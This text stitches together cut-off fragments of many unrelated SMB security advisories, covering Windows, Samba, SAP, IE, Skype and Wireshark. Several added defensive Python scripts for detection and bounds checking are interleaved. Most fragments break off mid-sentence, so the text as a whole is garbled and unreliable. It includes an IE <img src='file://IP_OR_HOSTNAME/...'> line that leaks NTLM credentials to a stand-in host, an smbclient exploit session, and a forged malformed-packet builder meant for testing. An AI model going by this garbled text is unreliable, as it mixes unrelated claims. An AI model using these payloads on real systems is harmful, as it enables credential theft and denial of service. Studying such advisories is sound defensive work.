SMB
(to get the scripts mentioned by this advisory please get the full
version at http://www.hexale.org/advisories/OCHOA-2010-0209.txt; I did
not include them here to reduce the size of this email)
Windows SMB NTLM Authentication Weak Nonce Vulnerability
Security Advisory
Hernan Ochoa (hernan@gmail.com) - Agustin Azubel (agustin.azubel@gmail.com)
Title: Windows SMB NTLM Authentication Weak Nonce Vulnerability
===============================================================================
Stratsec Security Advisory: SS-2010-003
===============================================================================
Title: Microsoft SMB Client Pool Overflow (MS10-006)
Version: 1.0
Issue type: Pool overflow
Affected vendor: Microsoft
Release date: 09/02/2010
Discovered by: Laurent Gaffié
In this case this is a preauth exploit.
The attacker can write, for example, into /tmp or anywhere the account
he is connecting with has access to (/home/<user>, etc.).
Exploit session (using the patched smbclient exploit):
smb is a Samba user created for the test.
root@nr-pentest:~/Downloads/samba-3.4.5/source3# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -Usmb //<host>/testmount/
Enter smb's password:
exploited remotely and causes corruption of kernel memory, which leads
to a Windows stop error (blue screen) or to arbitrary code execution.
The vulnerability is triggered during processing of a crafted TCP
segment destined to TCP port 139 or 445. These ports are used by the
Microsoft Server Message Block (SMB) protocol.
Cisco has released free software updates that address this
vulnerability.
Common Vulnerabilities and Exposures (CVE) identifier CVE-2007-5580 has
/*
*
* SMB SRV2.SYS Denial of Service PoC
* Release Date: Sep 8, 2009
* Severity: Medium/High
* Systems Affected: Windows Vista SP1+SP2, Windows 2008 SP2, Windows 7 Beta + RC
* Discovered by: Laurent Gaffié
*
* Description:
* SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality.
[DSECRG-11-038] SAP RSTXSCRP report - smb relay vulnerability
The SAP RSTXSCRP report has a path traversal vulnerability which can lead to an SMB relay attack and full control of the system.
Application: SAP NetWeaver
Versions Affected: SAP NetWeaver
Vendor URL: http://www.SAP.com
Bugs: Path traversal, SMBRelay
The cookies folder is hardcoded inside the Explorer engine as a
restricted site. You can check it by looking at the status bar when
browsing this folder with Windows Explorer.
When requesting a resource, for example, in the 'src' attribute of an
HTML 'img' tag, Internet Explorer allows the usage of 'smb' URIs. So,
when IE attempts to render the following line:
/-----------
<img src="file://IP_OR_HOSTNAME/PATH_TO_RESOURCE">
. Only run IE in Protected Mode if it is available on the operating
system.
. Use a different web browser to navigate untrusted web sites.
Additionally, although disabling file sharing when it is not needed and
filtering outbound SMB connections at the endpoint or the network perimeter
may not prevent exploitation, both are generally good security measures that
prevent disclosure of sensitive information such as valid usernames of
endpoint users.
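The <img src="file://..."> trick above and the outbound-SMB filtering advised in the mitigations both come down to one question: which references in a page resolve to a remote file:// or UNC location, and to which host? The scanner below is an added example, not code from the advisory. The list of fetched attributes and the sample page are constructed assumptions, and a scheme-relative "//host/path" is deliberately not treated as a UNC path, because in HTML it denotes an http(s) URL.

```python
"""Find HTML resource references that make Internet Explorer (and the Windows
redirector behind it) open an outbound SMB connection to a remote host.

Added example: this scanner and the sample page below are constructed for
illustration and are not part of the original advisory text."""
from html.parser import HTMLParser
import re

# Attributes whose value IE fetches while rendering (assumed list, extend as needed).
FETCH_ATTRS = {"src", "href", "data", "background", "action"}

# file://HOST/... or file:\\HOST\... with a non-empty host component.
_FILE_URL = re.compile(r"^\s*file:(?://|\\\\)([^/\\]+)[/\\]", re.IGNORECASE)
# A bare UNC path \\HOST\share\... ; "//host/x" is deliberately NOT matched,
# because in HTML that is a scheme-relative http(s) URL, not a UNC path.
_UNC_PATH = re.compile(r"^\s*\\\\([^/\\]+)[/\\]")

LOCAL_HOSTS = {"localhost", "127.0.0.1", "."}


def smb_target(value):
    """Return the remote host a reference would contact over SMB, or None.

    file:///C:/... (empty host) and http(s) URLs resolve locally or over HTTP
    and are therefore ignored."""
    for pattern in (_FILE_URL, _UNC_PATH):
        m = pattern.match(value)
        if m:
            host = m.group(1)
            return None if host.lower() in LOCAL_HOSTS else host
    return None


class _RefCollector(HTMLParser):
    """Collect (tag, attribute, host, raw value) for every SMB-bound reference."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        for name, value in attrs:
            if value is None or name not in FETCH_ATTRS:
                continue
            host = smb_target(value)
            if host is not None:
                self.hits.append((tag, name, host, value.strip()))


def find_smb_references(html):
    """Scan an HTML document and return the list of SMB-bound references."""
    collector = _RefCollector()
    collector.feed(html)
    collector.close()
    return collector.hits


# Constructed sample page: two references leak over SMB, the others do not.
SAMPLE_HTML = r"""
<html><body>
<img src="file://203.0.113.5/share/pixel.png">
<img src="\\fileserver\public\logo.png">
<img src="file:///C:/Windows/Web/wallpaper.jpg">
<script src="https://example.test/app.js"></script>
<a href="//example.test/x">scheme-relative, not UNC</a>
</body></html>
"""

if __name__ == "__main__":
    for tag, attr, host, raw in find_smb_references(SAMPLE_HTML):
        print("%s[%s] -> SMB to %s (%s)" % (tag, attr, host, raw))
```

The host returned by smb_target is the one an endpoint or perimeter filter on TCP/139 and TCP/445 has to block for the reference to fail without leaking NTLM credentials; when SMB is blocked but WebDAV is not, Windows may still retry the same host over HTTP.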
Microsoft has issued a patch to fix the vulnerability and a detailed
Vulnerability and Exploit: Javier Vicente Vallejo, http://www.vallejo.cc
Vulnerability Analysis: Ruben Santamarta, http://www.reversemode.com
Abstract
Microsoft Windows is prone to a remote Kernel Denial of Service due to the way srv.sys handles malformed WRITE_ANDX SMB packets.
Remote attackers could exploit this issue without valid credentials on the target machine. To exploit it successfully, the attacker needs enough privileges to send WRITE_ANDX packets remotely to an interface that uses a named pipe as its endpoint. Which interfaces allow NULL sessions varies between Windows versions; on Vista a reliable preauth attack through the “\LSARPC” pipe has been successfully demonstrated.
Affected versions
Discussion:
Addonics NAS Adapter Post-Auth DoS
Addonics NAS Adapter is prone to several post-authentication buffer overflows. Each of them crashes the entire TCP/IP stack, and the device has to be power cycled to restore any functionality. Addonics has implemented GUI-level (client-side) controls to prevent long inputs, but these are bypassed simply by issuing a direct HTTP GET request (the device does not use POST).
Addonics was notified of the buffer overflows via ticket 497283 submitted Monday, February 09, 2009 at 6:03:35 PM. I called Addonics on 3/4/09 at 12:44 and was told that they had confirmed the BoF condition and that engineers were working on a fix. They released an update (NASU2FW41 Loader 1.17) that did not address the issue: it only requires inputs 2 characters longer to trigger the crash, except for the SMB password field.
Exploiting these issues will crash the network stack and create a Denial of Service condition.
Firmware R3282-1.33c LOADER32 1.15 , and NASU2FW41 Loader1.17 are vulnerable; other versions may also be.
s/at least//
[ well-known facts snipped ]
> The Windows SMB server apparently won't cross reparse points, though, so
> there's no equivalent vulnerability.
NO, Windows SMB server crosses reparse points!
But as Dan Kaminsky pointed out, you need to have administrative rights
> [ well-known facts snipped ]
So ... your original note about junctions did not cover "well-known
facts", but my note about other reparse point types did?
> > The Windows SMB server apparently won't cross reparse points,
though,
> > so there's no equivalent vulnerability.
>
> NO, Windows SMB server crosses reparse points!
Please find further information here:
http://blog.acrossecurity.com/2011/05/anatomy-of-com-server-based-binary.html
http://blog.acrossecurity.com/2011/05/silently-pwning-protected-mode-ie9-and.html
In general there are two types of remote binary planting exploits: SMB and WebDAV.
The former works inside (local) networks where firewalls block outbound SMB traffic.
WebDAV attacks work through firewalls too since many firewalls allow outbound WebDAV
traffic and Windows silently falls back to WebDAV if SMB doesn't work. If our online
remote exploit doesn't work for you, you can download the PoC locally and test it in
your local network.
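The fallback the message describes (outbound SMB blocked, Windows retrying the same host over WebDAV) is visible from the perimeter. The script below is an added example, not the author's PoC: it correlates a firewall's dropped TCP/445 or TCP/139 connection with a WebDAV request (the Microsoft-WebDAV-MiniRedir user agent or a WebDAV method) from the same client to the same host shortly afterwards. The firewall and proxy log formats, the hosts and the timestamps are constructed for the example; only the two regexes need adapting to real logs.

```python
"""Detect the SMB-to-WebDAV fallback from the perimeter: a client's outbound
TCP/445 or /139 attempt is dropped, and seconds later the same client sends
WebDAV requests (Microsoft's MiniRedir user agent) to the same host through
the proxy.

Added example, not from the original message. The firewall and proxy line
formats below are constructed for the example; the two regexes are the only
thing to adapt for real iptables/Squid-style logs."""
import re
from datetime import datetime, timedelta

SMB_PORTS = {139, 445}
WEBDAV_METHODS = {"OPTIONS", "PROPFIND", "PROPPATCH", "MKCOL", "LOCK", "UNLOCK"}
MINIREDIR_UA = "Microsoft-WebDAV-MiniRedir"

# Constructed firewall format: "<ts> DROP TCP <src>:<sport> -> <dst>:<dport>"
_FW = re.compile(
    r"^(\S+) DROP TCP (\d+\.\d+\.\d+\.\d+):\d+ -> (\d+\.\d+\.\d+\.\d+):(\d+)$")
# Constructed proxy format: '<ts> <client> <METHOD> <url> "<user-agent>"'
_PX = re.compile(r'^(\S+) (\d+\.\d+\.\d+\.\d+) (\S+) (\S+) "([^"]*)"$')


def _ts(text):
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ")


def smb_drops(fw_lines):
    """Map (client, destination) -> timestamps of blocked SMB attempts."""
    drops = {}
    for line in fw_lines:
        m = _FW.match(line.strip())
        if m and int(m.group(4)) in SMB_PORTS:
            drops.setdefault((m.group(2), m.group(3)), []).append(_ts(m.group(1)))
    return drops


def webdav_requests(px_lines):
    """Yield (ts, client, host, method) for requests that look like WebDAV."""
    for line in px_lines:
        m = _PX.match(line.strip())
        if not m:
            continue
        ts, client, method, url, ua = m.groups()
        if method in WEBDAV_METHODS or MINIREDIR_UA in ua:
            host = re.sub(r"^https?://", "", url).split("/")[0].split(":")[0]
            yield _ts(ts), client, host, method


def detect_fallback(fw_lines, px_lines, window_s=120):
    """Return [(client, host, method)] for every WebDAV request that follows a
    blocked SMB attempt from the same client to the same host within window_s."""
    drops = smb_drops(fw_lines)
    hits = []
    for ts, client, host, method in webdav_requests(px_lines):
        for drop_ts in drops.get((client, host), []):
            if timedelta(0) <= ts - drop_ts <= timedelta(seconds=window_s):
                hits.append((client, host, method))
                break
    return hits


# Constructed sample logs. 10.0.0.7 shows the fallback; 10.0.0.9's WebDAV
# request comes 25 minutes after its SMB drop and is outside the window.
FIREWALL_LOG = [
    "2011-05-10T10:00:01Z DROP TCP 10.0.0.7:49211 -> 198.51.100.20:445",
    "2011-05-10T10:00:02Z DROP TCP 10.0.0.7:49212 -> 198.51.100.20:139",
    "2011-05-10T10:05:00Z DROP TCP 10.0.0.9:50100 -> 203.0.113.8:445",
]
PROXY_LOG = [
    '2011-05-10T10:00:04Z 10.0.0.7 OPTIONS http://198.51.100.20/ "Microsoft-WebDAV-MiniRedir/6.1.7601"',
    '2011-05-10T10:00:04Z 10.0.0.7 PROPFIND http://198.51.100.20/pub/ "Microsoft-WebDAV-MiniRedir/6.1.7601"',
    '2011-05-10T10:00:10Z 10.0.0.9 GET http://example.test/index.html "Mozilla/5.0"',
    '2011-05-10T10:30:00Z 10.0.0.9 PROPFIND http://203.0.113.8/ "Microsoft-WebDAV-MiniRedir/6.1.7601"',
]

if __name__ == "__main__":
    for client, host, method in detect_fallback(FIREWALL_LOG, PROXY_LOG):
        print("%s: SMB blocked, then WebDAV %s to %s" % (client, method, host))
```

The window is the parameter to tune: the redirector retries within seconds, so a short window keeps unrelated WebDAV traffic to the same host from being flagged. A WebDAV request to an external host with no preceding drop is still worth a separate, lower-confidence rule, since a perimeter that never blocked SMB in the first place produces no drop line at all.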
for the execution of arbitrary code.
Background
==========
Samba is a suite of SMB and CIFS client/server programs.
Affected packages
=================
-------------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
==========================================================
==
== Subject: Boundary failure when parsing SMB responses
== can result in a buffer overrun
==
== CVE ID#: CVE-2008-1105
==
== Versions: Samba 3.0.0 - 3.0.29 (inclusive)
======================================================================
Secunia Research 28/05/2008
- Samba "receive_smb_raw()" Buffer Overflow Vulnerability -
======================================================================
Table of Contents
Affected Software
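The srv2.sys NEGOTIATE header bug, the srv.sys WRITE_ANDX handling and the Samba receive_smb_raw() issue above are all failures to check an SMB length field against the bytes actually received. The parser below is an added example, not code from any of those advisories or from Samba: it decodes the 32-byte SMB1 header and the WordCount/ByteCount body of a NEGOTIATE PROTOCOL REQUEST and refuses any packet whose counts run past the data present. The builder's header field values (Flags 0x18, Flags2 0xC853, TID/PID) are typical but arbitrary, and the forged ByteCount is a constructed malformed case, not the specific trigger of any of the bugs.

```python
"""Parse an SMB1 (CIFS) NEGOTIATE PROTOCOL REQUEST with explicit bounds checks
on WordCount and ByteCount, the length fields a receiver must not trust.

Added example, not code from any of the advisories above. The field layout
follows the 32-byte SMB1 header; the header values used by the builder are
typical but arbitrary."""
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
HEADER_LEN = 32

# 32-byte SMB1 header, little-endian: magic, Command, Status, Flags, Flags2,
# PIDHigh, SecurityFeatures(8), Reserved, TID, PIDLow, UID, MID
_HDR = struct.Struct("<4sBIBHH8sHHHHH")
assert _HDR.size == HEADER_LEN


class SMBParseError(ValueError):
    """Raised for any length field that does not fit the bytes received."""


def parse_smb_header(buf):
    if len(buf) < HEADER_LEN:
        raise SMBParseError("short header: %d bytes" % len(buf))
    (magic, command, status, flags, flags2, pid_high,
     _sec, _reserved, tid, pid_low, uid, mid) = _HDR.unpack_from(buf, 0)
    if magic != SMB_MAGIC:
        raise SMBParseError("bad SMB magic %r" % magic)
    return {"command": command, "status": status, "flags": flags,
            "flags2": flags2, "pid_high": pid_high, "tid": tid,
            "pid": pid_low, "uid": uid, "mid": mid}


def parse_smb_body(buf, offset=HEADER_LEN):
    """Split the parameter words and data bytes that follow the header.

    Both WordCount and ByteCount are checked against the bytes actually
    present before anything is sliced; trusting them is the boundary failure."""
    if len(buf) < offset + 1:
        raise SMBParseError("missing WordCount")
    word_count = buf[offset]
    words_end = offset + 1 + 2 * word_count
    if len(buf) < words_end + 2:
        raise SMBParseError("WordCount %d runs past packet end" % word_count)
    words = buf[offset + 1:words_end]
    byte_count = struct.unpack_from("<H", buf, words_end)[0]
    data_start = words_end + 2
    remaining = len(buf) - data_start
    if byte_count > remaining:
        raise SMBParseError("ByteCount %d but only %d bytes remain"
                            % (byte_count, remaining))
    return words, buf[data_start:data_start + byte_count]


def parse_negotiate_request(buf):
    """Return (header dict, list of dialect strings) or raise SMBParseError."""
    hdr = parse_smb_header(buf)
    if hdr["command"] != SMB_COM_NEGOTIATE:
        raise SMBParseError("not a NEGOTIATE request: command 0x%02x" % hdr["command"])
    words, data = parse_smb_body(buf)
    if words:
        raise SMBParseError("NEGOTIATE request must have WordCount 0")
    dialects, pos = [], 0
    while pos < len(data):
        if data[pos] != 0x02:  # each dialect is 0x02 + NUL-terminated string
            raise SMBParseError("dialect entry at %d lacks 0x02 marker" % pos)
        end = data.find(b"\x00", pos + 1)
        if end == -1:
            raise SMBParseError("unterminated dialect string")
        dialects.append(data[pos + 1:end].decode("ascii", "replace"))
        pos = end + 1
    return hdr, dialects


def negotiate_is_well_formed(buf):
    try:
        parse_negotiate_request(buf)
        return True
    except SMBParseError:
        return False


def build_negotiate_request(dialects, byte_count=None):
    """Build a NEGOTIATE request; byte_count lets a test forge a ByteCount
    that does not match the data actually sent (the malformed case)."""
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    header = _HDR.pack(SMB_MAGIC, SMB_COM_NEGOTIATE, 0, 0x18, 0xC853, 0,
                       b"\x00" * 8, 0, 0xFFFF, 0xFEFF, 0, 0)
    count = len(data) if byte_count is None else byte_count
    return header + bytes([0]) + struct.pack("<H", count) + data


if __name__ == "__main__":
    good = build_negotiate_request(["NT LM 0.12", "SMB 2.002"])
    print(parse_negotiate_request(good)[1])
    print(negotiate_is_well_formed(build_negotiate_request(["NT LM 0.12"], byte_count=0x400)))
```

This is the class of check the boundary failures above were missing: validate every count against the bytes received before slicing or copying. For WRITE_ANDX the fields to bound are the data offset and data length in the parameter words rather than ByteCount alone, and the same pattern applies.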
One method of executable delivery is through the onenote://
URL protocol if Microsoft OneNote is installed.
OneNote will automatically open and process a onenote file shared
over an SMB share. Any executables stored within the onenote file
will be cached locally. This is done by downloading the embedded
executables and storing them in a known location.
C:/Users/[USERNAME]/AppData/Local/Microsoft/OneNote/12.0/OneNoteOfflineCache_Files/
Hi,
Considering that there are no updates available for Samba on ASUS Eee
PC (it runs a modified version of Samba as far as we know; the SMB protocol
is only partially supported), and even considering the fact that it is
Linux and not Microsoft Windows (the main reason that made us write this
blog post), we think it is not the same scenario.
Best regards,
ZDI-09-002: Microsoft SMB NT Trans2 Request Parsing Remote Code Execution
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-002
January 13, 2009
-- CVE ID:
CVE-2008-4835
-- Affected Vendors:
Microsoft
remote user when a Skype link was clicked.
Changes were made to Skype to remove available command line arguments when
the /URI argument is present, and to resolve the discovered injection vulnerability.
Although many of the useful arguments have been disallowed, Security-Assessment.com
found that the /Datapath argument can be included and directed to a remote SMB
share directly through a specially crafted Skype URI.
The Datapath argument specifies the location of the Skype configuration files and
security policy. Specifying a Datapath argument will override any local security
policy defined in the Windows registry.
ZDI-09-001: Microsoft SMB NT Trans Request Parsing Remote Code Execution
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-001
January 13, 2009
-- CVE ID:
CVE-2008-4834
-- Affected Vendors:
Microsoft
The target function can be run by any user with access to query the
database. This attack could also be conducted anonymously through a Web
application if it contained an SQL Injection vulnerability.
For the server to load the corrupted backup file, an attacker would have
to supply a path to a remote file using either SMB or WebDAV.
IV. DETECTION
iDefense confirmed the existence of this vulnerability in Microsoft SQL
Server 2005 Service Pack 2 Hot Fix 4. Additional tests against SQL
specified DBMS tables/columns, run his own SQL statement, read or
write either text or binary files on the file system, execute
arbitrary commands on the operating system, establish an out-of-band
stateful connection between the attacker box and the database server
via Metasploit payload stager, database stored procedure buffer
overflow exploitation or SMB relay attack and more.
Changes
=======
Remote exploitation of a buffer overflow vulnerability within Samba
Project's Samba could allow an attacker to execute arbitrary code with
root privileges.
The vulnerability exists in a certain function within Samba where an
attacker can trigger memory corruption by sending specially crafted SMB
requests, overwriting heap memory with attacker-supplied data, which can
allow remote code execution.
III. ANALYSIS
Exploitation allows attackers to execute arbitrary code on the targeted
Dear Alexandr Polyakov,
AFAIK, SMB NTLM relaying was closed with MS08-068 and Kerberos was never
possible to relay. Are you sure authentication is really possible with
patched windows systems?
--Monday, April 25, 2011, 12:21:57 PM, you wrote to bugtraq@securityfocus.com:
I. BACKGROUND
The snoop command line utility is installed by default on Solaris. It is
used to capture and display network traffic, similar to the widely used
tcpdump program. Server Message Block (SMB) is a network protocol used
for Microsoft Windows file sharing. More information can be found on the
vendor's website at the following URL.
http://docs.sun.com/app/docs/doc/816-0211/6m6nc677k?a=view
Problem Description:
This advisory updates wireshark to the latest version(s), fixing
several security issues:
* The SMB dissector could dereference a NULL pointer. (Bug 4734)
* J. Oquendo discovered that the ASN.1 BER dissector could overrun
the stack.
* The SMB PIPE dissector could dereference a NULL pointer on some
platforms.
* The SigComp Universal Decompressor Virtual Machine could go into